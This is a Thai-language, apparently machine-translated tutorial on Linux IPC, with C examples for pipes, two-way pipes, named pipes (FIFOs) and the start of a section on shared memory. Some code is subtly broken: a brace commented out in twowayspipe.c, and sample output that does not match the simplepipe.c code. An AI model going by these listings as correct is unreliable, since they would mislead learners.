ssize_t write(int fd, void *buf, size_t count)

การเรียกระบบข้างต้นคือการเขียนไปยังไฟล์ที่ระบุโดยมีอาร์กิวเมนต์ของ file descriptor fd ซึ่งเป็นบัฟเฟอร์ที่เหมาะสมพร้อมหน่วยความจำที่จัดสรร (แบบคงที่หรือแบบไดนามิก) และขนาดของบัฟเฟอร์

รหัสตัวอธิบายไฟล์คือการระบุไฟล์ที่เกี่ยวข้องซึ่งจะส่งคืนหลังจากเรียกการเรียกระบบ open () หรือ pipe ()

ต้องเปิดไฟล์ก่อนที่จะเขียนลงไฟล์ จะเปิดขึ้นโดยอัตโนมัติในกรณีที่เรียกการเรียกระบบ pipe ()

การเรียกนี้จะส่งคืนจำนวนไบต์ที่เขียน (หรือเป็นศูนย์ในกรณีที่ไม่มีการเขียน) เมื่อสำเร็จและ -1 ในกรณีที่ล้มเหลว มีการกำหนดหมายเลขข้อผิดพลาดที่เหมาะสมในกรณีที่เกิดความล้มเหลว

หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

ตัวอย่างโปรแกรม

ต่อไปนี้เป็นโปรแกรมตัวอย่างบางส่วน

Example program 1 - โปรแกรมเขียนและอ่านสองข้อความโดยใช้ไปป์

อัลกอริทึม

Step 1 - สร้างท่อ

Step 2 - ส่งข้อความไปที่ท่อ

Step 3 - ดึงข้อความจากท่อและเขียนลงในเอาต์พุตมาตรฐาน

Step 4 - ส่งข้อความไปอีกท่อ

Step 5 - ดึงข้อความจากท่อและเขียนลงในเอาต์พุตมาตรฐาน

Note - การดึงข้อความสามารถทำได้หลังจากส่งข้อความทั้งหมดแล้ว

Source Code: simplepipe.c

#include<stdio.h>
#include<unistd.h>

int main() {
   int pipefds[2];
   int returnstatus;
   char writemessages[2][20]={"Hi", "Hello"};
   char readmessage[20];
   returnstatus = pipe(pipefds);
   
   if (returnstatus == -1) {
      printf("Unable to create pipe\n");
      return 1;
   }
   
   printf("Writing to pipe - Message 1 is %s\n", writemessages[0]);
   write(pipefds[1], writemessages[0], sizeof(writemessages[0]));
   read(pipefds[0], readmessage, sizeof(readmessage));
   printf("Reading from pipe – Message 1 is %s\n", readmessage);
   printf("Writing to pipe - Message 2 is %s\n", writemessages[0]);
   write(pipefds[1], writemessages[1], sizeof(writemessages[0]));
   read(pipefds[0], readmessage, sizeof(readmessage));
   printf("Reading from pipe – Message 2 is %s\n", readmessage);
   return 0;
}

Note- ตามหลักการแล้วจำเป็นต้องตรวจสอบสถานะการส่งคืนสำหรับการเรียกระบบทุกครั้ง เพื่อให้กระบวนการง่ายขึ้นการตรวจสอบจะไม่ทำสำหรับการโทรทั้งหมด

ขั้นตอนการดำเนินการ

การรวบรวม

gcc -o simplepipe simplepipe.c

การดำเนินการ / เอาต์พุต

Writing to pipe - Message 1 is Hi
Reading from pipe – Message 1 is Hi
Writing to pipe - Message 2 is Hi
Reading from pipe – Message 2 is Hell

Example program 2 - โปรแกรมเขียนและอ่านสองข้อความผ่านท่อโดยใช้กระบวนการหลักและลูก

อัลกอริทึม

Step 1 - สร้างท่อ

Step 2 - สร้างกระบวนการลูก

Step 3 - กระบวนการหลักเขียนไปยังท่อ

Step 4 - กระบวนการย่อยดึงข้อความจากไพพ์และเขียนลงในเอาต์พุตมาตรฐาน

Step 5 - ทำซ้ำขั้นตอนที่ 3 และขั้นตอนที่ 4 อีกครั้ง

Source Code: pipewithprocesses.c

#include<stdio.h>
#include<unistd.h>

int main() {
   int pipefds[2];
   int returnstatus;
   int pid;
   char writemessages[2][20]={"Hi", "Hello"};
   char readmessage[20];
   returnstatus = pipe(pipefds);
   if (returnstatus == -1) {
      printf("Unable to create pipe\n");
      return 1;
   }
   pid = fork();
   
   // Child process
   if (pid == 0) {
      read(pipefds[0], readmessage, sizeof(readmessage));
      printf("Child Process - Reading from pipe – Message 1 is %s\n", readmessage);
      read(pipefds[0], readmessage, sizeof(readmessage));
      printf("Child Process - Reading from pipe – Message 2 is %s\n", readmessage);
   } else { //Parent process
      printf("Parent Process - Writing to pipe - Message 1 is %s\n", writemessages[0]);
      write(pipefds[1], writemessages[0], sizeof(writemessages[0]));
      printf("Parent Process - Writing to pipe - Message 2 is %s\n", writemessages[1]);
      write(pipefds[1], writemessages[1], sizeof(writemessages[1]));
   }
   return 0;
}

ขั้นตอนการดำเนินการ

Compilation

gcc pipewithprocesses.c –o pipewithprocesses

Execution

Parent Process - Writing to pipe - Message 1 is Hi
Parent Process - Writing to pipe - Message 2 is Hello
Child Process - Reading from pipe – Message 1 is Hi
Child Process - Reading from pipe – Message 2 is Hello

การสื่อสารสองทางโดยใช้ท่อ

การสื่อสารไปป์ถูกมองว่าเป็นการสื่อสารทางเดียวเท่านั้นเช่นกระบวนการหลักเขียนและกระบวนการลูกอ่านหรือกลับกัน แต่ไม่ใช่ทั้งสองอย่าง อย่างไรก็ตามจะเกิดอะไรขึ้นถ้าทั้งผู้ปกครองและเด็กต้องเขียนและอ่านจากท่อพร้อมกันการแก้ปัญหาคือการสื่อสารสองทางโดยใช้ท่อ ต้องใช้ท่อสองท่อเพื่อสร้างการสื่อสารสองทาง

ต่อไปนี้เป็นขั้นตอนในการสื่อสารสองทาง -

Step 1- สร้างท่อสองท่อ อันดับแรกคือให้ผู้ปกครองเขียนและให้เด็กอ่านพูดเป็น pipe1 อันที่สองคือให้เด็กเขียนและผู้ปกครองอ่านพูดเป็น pipe2

Step 2 - สร้างกระบวนการลูก

Step 3 - ปิดปลายที่ไม่ต้องการเนื่องจากจำเป็นต้องใช้ปลายด้านเดียวสำหรับการสื่อสารแต่ละครั้ง

Step 4 - ปิดปลายที่ไม่ต้องการในกระบวนการหลักอ่านปลายท่อ 1 และเขียนปลายท่อ 2

Step 5 - ปิดปลายที่ไม่ต้องการในกระบวนการลูกเขียนปลายท่อ 1 และอ่านปลายท่อ 2

Step 6 - ดำเนินการสื่อสารตามที่กำหนด

โปรแกรมตัวอย่าง

Sample program 1 - บรรลุการสื่อสารสองทางโดยใช้ท่อ

อัลกอริทึม

Step 1 - สร้าง pipe1 สำหรับกระบวนการหลักในการเขียนและกระบวนการย่อยเพื่ออ่าน

Step 2 - สร้าง pipe2 เพื่อให้กระบวนการย่อยเขียนและกระบวนการพาเรนต์อ่าน

Step 3 - ปิดปลายท่อที่ไม่ต้องการจากฝั่งแม่และเด็ก

Step 4 - กระบวนการหลักในการเขียนข้อความและกระบวนการลูกเพื่ออ่านและแสดงบนหน้าจอ

Step 5 - กระบวนการย่อยในการเขียนข้อความและกระบวนการหลักเพื่ออ่านและแสดงบนหน้าจอ

Source Code: twowayspipe.c

#include<stdio.h>
#include<unistd.h>

int main() {
   int pipefds1[2], pipefds2[2];
   int returnstatus1, returnstatus2;
   int pid;
   char pipe1writemessage[20] = "Hi";
   char pipe2writemessage[20] = "Hello";
   char readmessage[20];
   returnstatus1 = pipe(pipefds1);
   
   if (returnstatus1 == -1) {
      printf("Unable to create pipe 1 \n");
      return 1;
   }
   returnstatus2 = pipe(pipefds2);
   
   if (returnstatus2 == -1) {
      printf("Unable to create pipe 2 \n");
      return 1;
   }
   pid = fork();
   
   if (pid != 0) // Parent process {
      close(pipefds1[0]); // Close the unwanted pipe1 read side
      close(pipefds2[1]); // Close the unwanted pipe2 write side
      printf("In Parent: Writing to pipe 1 – Message is %s\n", pipe1writemessage);
      write(pipefds1[1], pipe1writemessage, sizeof(pipe1writemessage));
      read(pipefds2[0], readmessage, sizeof(readmessage));
      printf("In Parent: Reading from pipe 2 – Message is %s\n", readmessage);
   } else { //child process
      close(pipefds1[1]); // Close the unwanted pipe1 write side
      close(pipefds2[0]); // Close the unwanted pipe2 read side
      read(pipefds1[0], readmessage, sizeof(readmessage));
      printf("In Child: Reading from pipe 1 – Message is %s\n", readmessage);
      printf("In Child: Writing to pipe 2 – Message is %s\n", pipe2writemessage);
      write(pipefds2[1], pipe2writemessage, sizeof(pipe2writemessage));
   }
   return 0;
}

ขั้นตอนการดำเนินการ

การรวบรวม

gcc twowayspipe.c –o twowayspipe

การดำเนินการ

In Parent: Writing to pipe 1 – Message is Hi
In Child: Reading from pipe 1 – Message is Hi
In Child: Writing to pipe 2 – Message is Hello
In Parent: Reading from pipe 2 – Message is Hello

ท่อมีไว้สำหรับการสื่อสารระหว่างกระบวนการที่เกี่ยวข้อง เราสามารถใช้ไพพ์สำหรับการสื่อสารในกระบวนการที่ไม่เกี่ยวข้องกันได้หรือไม่เช่นเราต้องการเรียกใช้โปรแกรมไคลเอนต์จากเทอร์มินัลหนึ่งและโปรแกรมเซิร์ฟเวอร์จากเทอร์มินัลอื่น คำตอบคือไม่แล้วเราจะบรรลุกระบวนการสื่อสารที่ไม่เกี่ยวข้องกันได้อย่างไรคำตอบง่ายๆก็คือท่อที่มีชื่อ แม้ว่าสิ่งนี้จะใช้ได้กับกระบวนการที่เกี่ยวข้อง แต่ก็ไม่มีความหมายในการใช้ไปป์ที่มีชื่อสำหรับการสื่อสารในกระบวนการที่เกี่ยวข้อง

เราใช้ท่อหนึ่งท่อสำหรับการสื่อสารทางเดียวและสองท่อสำหรับการสื่อสารแบบสองทิศทาง ใช้เงื่อนไขเดียวกันสำหรับท่อที่มีชื่อหรือไม่ คำตอบคือไม่เราสามารถใช้ไปป์ชื่อเดียวที่สามารถใช้สำหรับการสื่อสารสองทาง (การสื่อสารระหว่างเซิร์ฟเวอร์และไคลเอนต์รวมถึงไคลเอนต์และเซิร์ฟเวอร์ในเวลาเดียวกัน) เนื่องจาก Named Pipe รองรับการสื่อสารแบบสองทิศทาง

อีกชื่อหนึ่งของท่อที่มีชื่อคือ FIFO (First-In-First-Out). ให้เราดูการเรียกระบบ (mknod ()) เพื่อสร้างไปป์ที่มีชื่อซึ่งเป็นไฟล์พิเศษชนิดหนึ่ง

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

int mknod(const char *pathname, mode_t mode, dev_t dev);

การเรียกระบบนี้จะสร้างไฟล์พิเศษหรือโหนดระบบไฟล์เช่นไฟล์ธรรมดาไฟล์อุปกรณ์หรือ FIFO อาร์กิวเมนต์สำหรับการเรียกระบบคือชื่อพา ธ โหมดและ dev ชื่อพา ธ พร้อมกับคุณสมบัติของโหมดและข้อมูลอุปกรณ์ ชื่อพา ธ เป็นแบบสัมพัทธ์หากไม่ได้ระบุไดเร็กทอรีจะถูกสร้างในไดเร็กทอรีปัจจุบัน โหมดที่ระบุคือโหมดของไฟล์ที่ระบุประเภทไฟล์เช่นชนิดของไฟล์และโหมดไฟล์ดังที่กล่าวไว้ในตารางต่อไปนี้ ฟิลด์ dev คือการระบุข้อมูลอุปกรณ์เช่นหมายเลขอุปกรณ์หลักและหมายเลขรอง

ประเภทไฟล์ คำอธิบาย ประเภทไฟล์ คำอธิบาย
S_IFBLK บล็อกพิเศษ S_IFREG ไฟล์ปกติ
S_IFCHR อักขระพิเศษ S_IFDIR ไดเรกทอรี
S_IFIFO FIFO พิเศษ S_IFLNK ลิงค์สัญลักษณ์
โหมดไฟล์ คำอธิบาย โหมดไฟล์ คำอธิบาย
S_IRWXU อ่านเขียนดำเนินการ / ค้นหาโดยเจ้าของ S_IWGRP เขียนอนุญาตกลุ่ม
S_IRUSR อ่านอนุญาตเจ้าของ S_IXGRP สิทธิ์ดำเนินการ / ค้นหากลุ่ม
S_IWUSR เขียนอนุญาตเจ้าของ S_IRWXO อ่านเขียนดำเนินการ / ค้นหาโดยผู้อื่น
S_IXUSR สิทธิ์ดำเนินการ / ค้นหาเจ้าของ S_IROTH อ่านอนุญาตอื่น ๆ
S_IRWXG อ่านเขียนดำเนินการ / ค้นหาตามกลุ่ม S_IWOTH เขียนอนุญาตอื่น ๆ
S_IRGRP อ่านอนุญาตกลุ่ม S_IXOTH สิทธิ์ดำเนินการ / ค้นหาอื่น ๆ

โหมดไฟล์ยังสามารถแสดงในรูปแบบฐานแปดเช่น 0XYZ โดยที่ X แทนเจ้าของ Y แทนกลุ่มและ Z แทนผู้อื่น ค่าของ X, Y หรือ Z มีค่าตั้งแต่ 0 ถึง 7 ค่าสำหรับการอ่านเขียนและดำเนินการคือ 4, 2, 1 ตามลำดับ หากจำเป็นต้องใช้ร่วมกันระหว่างการอ่านเขียนและดำเนินการจากนั้นเพิ่มค่าตามนั้น

สมมติว่าถ้าเราพูดถึง 0640 หมายความว่าอ่านและเขียน (4 + 2 = 6) สำหรับเจ้าของอ่าน (4) สำหรับกลุ่มและไม่มีสิทธิ์ (0) สำหรับผู้อื่น

การโทรนี้จะคืนค่าเป็นศูนย์เมื่อสำเร็จและ -1 ในกรณีที่ล้มเหลว หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

#include <sys/types.h>
#include <sys/stat.h>

int mkfifo(const char *pathname, mode_t mode)

ฟังก์ชันไลบรารีนี้สร้างไฟล์พิเศษ FIFO ซึ่งใช้สำหรับไพพ์ที่มีชื่อ อาร์กิวเมนต์ของฟังก์ชันนี้คือชื่อไฟล์และโหมด ชื่อไฟล์อาจเป็นพา ธ สัมบูรณ์หรือพา ธ สัมพัทธ์ หากไม่ได้ระบุชื่อพา ธ แบบเต็ม (หรือพา ธ สัมบูรณ์) ไฟล์จะถูกสร้างขึ้นในโฟลเดอร์ปัจจุบันของกระบวนการเรียกใช้งาน ข้อมูลโหมดไฟล์เป็นไปตามที่อธิบายไว้ในการเรียกระบบ mknod ()

การโทรนี้จะคืนค่าเป็นศูนย์เมื่อสำเร็จและ -1 ในกรณีที่ล้มเหลว หากต้องการทราบสาเหตุของความล้มเหลวให้ตรวจสอบด้วยฟังก์ชัน errno variable หรือ perror ()

ให้เราพิจารณาโปรแกรมสำหรับเรียกใช้เซิร์ฟเวอร์บนเทอร์มินัลหนึ่งและรันไคลเอนต์บนเทอร์มินัลอื่น โปรแกรมจะทำการสื่อสารทางเดียวเท่านั้น ไคลเอนต์ยอมรับอินพุตของผู้ใช้และส่งข้อความไปยังเซิร์ฟเวอร์เซิร์ฟเวอร์จะพิมพ์ข้อความบนเอาต์พุต กระบวนการนี้จะดำเนินต่อไปจนกว่าผู้ใช้จะเข้าสู่สตริง“ end”

ให้เราเข้าใจสิ่งนี้ด้วยตัวอย่าง -

Step 1 - สร้างสองกระบวนการหนึ่งคือเซิร์ฟเวอร์ที่ห้าและอีกกระบวนการหนึ่งคือห้าเซลล์

Step 2 - กระบวนการเซิร์ฟเวอร์ดำเนินการดังต่อไปนี้ -

  • สร้างไปป์ที่มีชื่อ (โดยใช้การเรียกระบบ mknod ()) ด้วยชื่อ“ MYFIFO” หากไม่ได้สร้าง

  • เปิดไปป์ที่มีชื่อเพื่อวัตถุประสงค์ในการอ่านเท่านั้น

  • ที่นี่สร้าง FIFO พร้อมสิทธิ์ในการอ่านและเขียนสำหรับเจ้าของ อ่านสำหรับกลุ่มและไม่มีสิทธิ์สำหรับผู้อื่น

  • รอข้อความจากลูกค้าอย่างไม่มีที่สิ้นสุด

  • หากข้อความที่ได้รับจากไคลเอนต์ไม่ใช่“ end” ให้พิมพ์ข้อความนั้น หากข้อความเป็น "end" ให้ปิด fifo และสิ้นสุดกระบวนการ

Step 3 - กระบวนการลูกค้าดำเนินการดังต่อไปนี้ -

  • เปิดไปป์ที่มีชื่อเพื่อวัตถุประสงค์ในการเขียนเท่านั้น

  • ยอมรับสตริงจากผู้ใช้

  • ตรวจสอบว่าผู้ใช้ป้อน "end" หรืออื่น ๆ ที่ไม่ใช่ "end" ไม่ว่าจะด้วยวิธีใดระบบจะส่งข้อความไปยังเซิร์ฟเวอร์ อย่างไรก็ตามหากสตริงเป็น "end" สิ่งนี้จะปิด FIFO และสิ้นสุดกระบวนการด้วย

  • ทำซ้ำไปเรื่อย ๆ จนกว่าผู้ใช้จะเข้าสู่สตริง“ end”

ตอนนี้เรามาดูไฟล์เซิร์ฟเวอร์ FIFO

/* Filename: fifoserver.c */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define FIFO_FILE "MYFIFO"
int main() {
   int fd;
   char readbuf[80];
   char end[10];
   int to_end;
   int read_bytes;
   
   /* Create the FIFO if it does not exist */
   mknod(FIFO_FILE, S_IFIFO|0640, 0);
   strcpy(end, "end");
   while(1) {
      fd = open(FIFO_FILE, O_RDONLY);
      read_bytes = read(fd, readbuf, sizeof(readbuf));
      readbuf[read_bytes] = '\0';
      printf("Received string: \"%s\" and length is %d\n", readbuf, (int)strlen(readbuf));
      to_end = strcmp(readbuf, end);
      if (to_end == 0) {
         close(fd);
         break;
      }
   }
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

Received string: "this is string 1" and length is 16
Received string: "fifo test" and length is 9
Received string: "fifo client and server" and length is 22
Received string: "end" and length is 3

ตอนนี้เรามาดูโค้ดตัวอย่างไคลเอ็นต์ FIFO

/* Filename: fifoclient.c */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define FIFO_FILE "MYFIFO"
int main() {
   int fd;
   int end_process;
   int stringlen;
   char readbuf[80];
   char end_str[5];
   printf("FIFO_CLIENT: Send messages, infinitely, to end enter \"end\"\n");
   fd = open(FIFO_FILE, O_CREAT|O_WRONLY);
   strcpy(end_str, "end");
   
   while (1) {
      printf("Enter string: ");
      fgets(readbuf, sizeof(readbuf), stdin);
      stringlen = strlen(readbuf);
      readbuf[stringlen - 1] = '\0';
      end_process = strcmp(readbuf, end_str);
      
      //printf("end_process is %d\n", end_process);
      if (end_process != 0) {
         write(fd, readbuf, strlen(readbuf));
         printf("Sent string: \"%s\" and string length is %d\n", readbuf, (int)strlen(readbuf));
      } else {
         write(fd, readbuf, strlen(readbuf));
         printf("Sent string: \"%s\" and string length is %d\n", readbuf, (int)strlen(readbuf));
         close(fd);
         break;
      }
   }
   return 0;
}

ลองมาที่ผลลัพธ์ที่มาถึง

ขั้นตอนการรวบรวมและดำเนินการ

FIFO_CLIENT: Send messages, infinitely, to end enter "end"
Enter string: this is string 1
Sent string: "this is string 1" and string length is 16
Enter string: fifo test
Sent string: "fifo test" and string length is 9
Enter string: fifo client and server
Sent string: "fifo client and server" and string length is 22
Enter string: end
Sent string: "end" and string length is 3

การสื่อสารสองทางโดยใช้ท่อที่มีชื่อ

การสื่อสารระหว่างท่อหมายถึงทิศทางเดียว ท่อถูก จำกัด การสื่อสารทางเดียวโดยทั่วไปและต้องการอย่างน้อยสองท่อสำหรับการสื่อสารสองทาง ท่อมีไว้สำหรับกระบวนการที่เกี่ยวข้องกันเท่านั้น ไม่สามารถใช้ไพพ์สำหรับการสื่อสารในกระบวนการที่ไม่เกี่ยวข้องกันได้เช่นหากเราต้องการดำเนินการกระบวนการหนึ่งจากเทอร์มินัลหนึ่งและอีกกระบวนการหนึ่งจากเทอร์มินัลอื่นจะใช้ไปป์ไม่ได้ เรามีวิธีง่ายๆในการสื่อสารระหว่างสองกระบวนการพูดกระบวนการที่ไม่เกี่ยวข้องกันอย่างง่ายๆหรือไม่? คำตอบคือใช่ ท่อที่มีชื่อมีไว้สำหรับการสื่อสารระหว่างกระบวนการที่ไม่เกี่ยวข้องกันตั้งแต่สองกระบวนการขึ้นไปและยังสามารถสื่อสารแบบสองทิศทางได้อีกด้วย

เราได้เห็นการสื่อสารแบบทิศทางเดียวระหว่างไปป์ที่มีชื่อแล้วนั่นคือข้อความจากไคลเอนต์ไปยังเซิร์ฟเวอร์ ตอนนี้ให้เราดูที่การสื่อสารแบบสองทิศทางคือไคลเอนต์ส่งข้อความไปยังเซิร์ฟเวอร์และเซิร์ฟเวอร์รับข้อความและส่งข้อความกลับไปยังไคลเอนต์โดยใช้ไปป์ที่มีชื่อเดียวกัน

ต่อไปนี้เป็นตัวอย่าง -

Step 1 - สร้างสองกระบวนการหนึ่งคือ fifoserver_twoway และอีกกระบวนการหนึ่งคือ fifoclient_twoway

Step 2 - กระบวนการเซิร์ฟเวอร์ดำเนินการดังต่อไปนี้ -

  • สร้างไปป์ที่มีชื่อ (โดยใช้ฟังก์ชันไลบรารี mkfifo ()) ด้วยชื่อ“ fifo_twoway” ในไดเร็กทอรี / tmp หากไม่ได้สร้าง

  • เปิดไปป์ที่มีชื่อเพื่อวัตถุประสงค์ในการอ่านและเขียน

  • ที่นี่สร้าง FIFO พร้อมสิทธิ์ในการอ่านและเขียนสำหรับเจ้าของ อ่านสำหรับกลุ่มและไม่มีสิทธิ์สำหรับผู้อื่น

  • รอข้อความจากลูกค้าอย่างไม่มีที่สิ้นสุด

  • หากข้อความที่ได้รับจากไคลเอนต์ไม่ใช่“ end” ให้พิมพ์ข้อความและย้อนกลับสตริง สตริงที่ย้อนกลับจะถูกส่งกลับไปยังไคลเอนต์ หากข้อความเป็น "end" ให้ปิด fifo และสิ้นสุดกระบวนการ

Step 3 - กระบวนการลูกค้าดำเนินการดังต่อไปนี้ -

  • เปิดไปป์ที่มีชื่อเพื่อวัตถุประสงค์ในการอ่านและเขียน

  • ยอมรับสตริงจากผู้ใช้

  • ตรวจสอบว่าผู้ใช้ป้อน "end" หรืออื่น ๆ ที่ไม่ใช่ "end" ไม่ว่าจะด้วยวิธีใดระบบจะส่งข้อความไปยังเซิร์ฟเวอร์ อย่างไรก็ตามหากสตริงเป็น "end" สิ่งนี้จะปิด FIFO และสิ้นสุดกระบวนการด้วย

  • หากข้อความถูกส่งโดยไม่ใช่“ end” ข้อความนั้นจะรอข้อความ (สตริงย้อนกลับ) จากไคลเอนต์และพิมพ์สตริงที่กลับรายการ

  • ทำซ้ำเรื่อย ๆ จนกว่าผู้ใช้จะเข้าสู่สตริง“ end”

ตอนนี้เรามาดูโค้ดตัวอย่างเซิร์ฟเวอร์ FIFO

/* Filename: fifoserver_twoway.c */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define FIFO_FILE "/tmp/fifo_twoway"
void reverse_string(char *);
int main() {
   int fd;
   char readbuf[80];
   char end[10];
   int to_end;
   int read_bytes;
   
   /* Create the FIFO if it does not exist */
   mkfifo(FIFO_FILE, S_IFIFO|0640);
   strcpy(end, "end");
   fd = open(FIFO_FILE, O_RDWR);
   while(1) {
      read_bytes = read(fd, readbuf, sizeof(readbuf));
      readbuf[read_bytes] = '\0';
      printf("FIFOSERVER: Received string: \"%s\" and length is %d\n", readbuf, (int)strlen(readbuf));
      to_end = strcmp(readbuf, end);
      
      if (to_end == 0) {
         close(fd);
         break;
      }
      reverse_string(readbuf);
      printf("FIFOSERVER: Sending Reversed String: \"%s\" and length is %d\n", readbuf, (int) strlen(readbuf));
      write(fd, readbuf, strlen(readbuf));
      /*
      sleep - This is to make sure other process reads this, otherwise this
      process would retrieve the message
      */
      sleep(2);
   }
   return 0;
}

void reverse_string(char *str) {
   int last, limit, first;
   char temp;
   last = strlen(str) - 1;
   limit = last/2;
   first = 0;
   
   while (first < last) {
      temp = str[first];
      str[first] = str[last];
      str[last] = temp;
      first++;
      last--;
   }
   return;
}

ขั้นตอนการรวบรวมและดำเนินการ

FIFOSERVER: Received string: "LINUX IPCs" and length is 10
FIFOSERVER: Sending Reversed String: "sCPI XUNIL" and length is 10
FIFOSERVER: Received string: "Inter Process Communication" and length is 27
FIFOSERVER: Sending Reversed String: "noitacinummoC ssecorP retnI" and length is 27
FIFOSERVER: Received string: "end" and length is 3

ตอนนี้เรามาดูโค้ดตัวอย่างไคลเอ็นต์ FIFO

/* Filename: fifoclient_twoway.c */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define FIFO_FILE "/tmp/fifo_twoway"
int main() {
   int fd;
   int end_process;
   int stringlen;
   int read_bytes;
   char readbuf[80];
   char end_str[5];
   printf("FIFO_CLIENT: Send messages, infinitely, to end enter \"end\"\n");
   fd = open(FIFO_FILE, O_CREAT|O_RDWR);
   strcpy(end_str, "end");
   
   while (1) {
      printf("Enter string: ");
      fgets(readbuf, sizeof(readbuf), stdin);
      stringlen = strlen(readbuf);
      readbuf[stringlen - 1] = '\0';
      end_process = strcmp(readbuf, end_str);
      
      //printf("end_process is %d\n", end_process);
      if (end_process != 0) {
         write(fd, readbuf, strlen(readbuf));
         printf("FIFOCLIENT: Sent string: \"%s\" and string length is %d\n", readbuf, (int)strlen(readbuf));
         read_bytes = read(fd, readbuf, sizeof(readbuf));
         readbuf[read_bytes] = '\0';
         printf("FIFOCLIENT: Received string: \"%s\" and length is %d\n", readbuf, (int)strlen(readbuf));
      } else {
         write(fd, readbuf, strlen(readbuf));
         printf("FIFOCLIENT: Sent string: \"%s\" and string length is %d\n", readbuf, (int)strlen(readbuf));
         close(fd);
         break;
      }
   }
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

FIFO_CLIENT: Send messages, infinitely, to end enter "end"
Enter string: LINUX IPCs
FIFOCLIENT: Sent string: "LINUX IPCs" and string length is 10
FIFOCLIENT: Received string: "sCPI XUNIL" and length is 10
Enter string: Inter Process Communication
FIFOCLIENT: Sent string: "Inter Process Communication" and string length is 27
FIFOCLIENT: Received string: "noitacinummoC ssecorP retnI" and length is 27
Enter string: end
FIFOCLIENT: Sent string: "end" and string length is 3

หน่วยความจำร่วมคือหน่วยความจำที่ใช้ร่วมกันระหว่างสองกระบวนการขึ้นไป อย่างไรก็ตามเหตุใดเราจึงต้องแบ่งปันหน่วยความจำหรือวิธีการสื่อสารอื่น ๆ

เพื่อย้ำอีกครั้งว่าแต่ละกระบวนการมีพื้นที่แอดเดรสของตัวเองหากกระบวนการใดต้องการสื่อสารกับข้อมูลบางส่วนจากพื้นที่ที่อยู่ของตัวเองไปยังกระบวนการอื่น ๆ ก็จะทำได้ด้วยเทคนิค IPC (การสื่อสารระหว่างกระบวนการ) เท่านั้น ดังที่เราทราบกันดีอยู่แล้วการสื่อสารอาจอยู่ระหว่างกระบวนการที่เกี่ยวข้องหรือไม่เกี่ยวข้องกัน

โดยปกติแล้วการสื่อสารระหว่างกระบวนการที่เกี่ยวข้องจะดำเนินการโดยใช้ Pipes หรือ Named Pipes กระบวนการที่ไม่เกี่ยวข้องกัน (เช่นกระบวนการหนึ่งที่ทำงานในเทอร์มินัลเดียวและอีกกระบวนการหนึ่งในเทอร์มินัลอื่น) การสื่อสารสามารถทำได้โดยใช้ Named Pipes หรือผ่านเทคนิค IPC ยอดนิยมของ Shared Memory และ Message Queues

เราได้เห็นเทคนิค IPC ของ Pipes และ Named ไปป์แล้วและตอนนี้ถึงเวลาที่ต้องรู้เทคนิค IPC ที่เหลือ ได้แก่ Shared Memory, Message Queues, Semaphores, Signals และ Memory Mapping

ในบทนี้เราจะรู้ทุกอย่างเกี่ยวกับหน่วยความจำที่ใช้ร่วมกัน

เราทราบดีว่าในการสื่อสารระหว่างสองกระบวนการหรือมากกว่านั้นเราใช้หน่วยความจำที่ใช้ร่วมกัน แต่ก่อนที่จะใช้หน่วยความจำที่ใช้ร่วมกันสิ่งที่ต้องทำกับการเรียกระบบให้เราดูสิ่งนี้ -

  • สร้างเซ็กเมนต์หน่วยความจำแบบแบ่งใช้หรือใช้เซ็กเมนต์หน่วยความจำแบบแบ่งใช้ที่สร้างไว้แล้ว (shmget ())

  • แนบกระบวนการกับเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ที่สร้างไว้แล้ว (shmat ())

  • แยกกระบวนการออกจากเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ที่แนบมาแล้ว (shmdt ())

  • ควบคุมการดำเนินการบนเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ (shmctl ())

ให้เราดูรายละเอียดเล็กน้อยของการเรียกระบบที่เกี่ยวข้องกับหน่วยความจำที่ใช้ร่วมกัน

#include <sys/ipc.h>
#include <sys/shm.h>

int shmget(key_t key, size_t size, int shmflg)

การเรียกระบบข้างต้นสร้างหรือจัดสรรเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ System V อาร์กิวเมนต์ที่ต้องส่งผ่านมีดังนี้ -

first argument, key,รู้จักเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ คีย์อาจเป็นได้ทั้งค่าตามอำเภอใจหรือค่าที่ได้มาจากฟังก์ชันไลบรารี ftok () คีย์นี้ยังสามารถเป็น IPC_PRIVATE ซึ่งหมายถึงการรันกระบวนการในฐานะเซิร์ฟเวอร์และไคลเอนต์ (ความสัมพันธ์แม่และลูก) เช่นการสื่อสารระหว่างกระบวนการที่เกี่ยวข้องกัน หากไคลเอ็นต์ต้องการใช้หน่วยความจำแบบแบ่งใช้กับคีย์นี้จะต้องเป็นกระบวนการย่อยของเซิร์ฟเวอร์ นอกจากนี้กระบวนการลูกจะต้องถูกสร้างขึ้นหลังจากที่ผู้ปกครองได้รับหน่วยความจำที่ใช้ร่วมกันแล้ว

second argument, size, คือขนาดของเซ็กเมนต์หน่วยความจำแบบแบ่งใช้ที่ปัดเศษเป็นจำนวน PAGE_SIZE

third argument, shmflg,ระบุแฟล็กหน่วยความจำแบบแบ่งใช้ที่ต้องการเช่น IPC_CREAT (การสร้างเซ็กเมนต์ใหม่) หรือ IPC_EXCL (ใช้กับ IPC_CREAT เพื่อสร้างเซ็กเมนต์ใหม่และการเรียกล้มเหลวหากมีเซ็กเมนต์นั้นอยู่แล้ว) จำเป็นต้องผ่านการอนุญาตเช่นกัน

Note - ดูส่วนก่อนหน้าสำหรับรายละเอียดเกี่ยวกับสิทธิ์

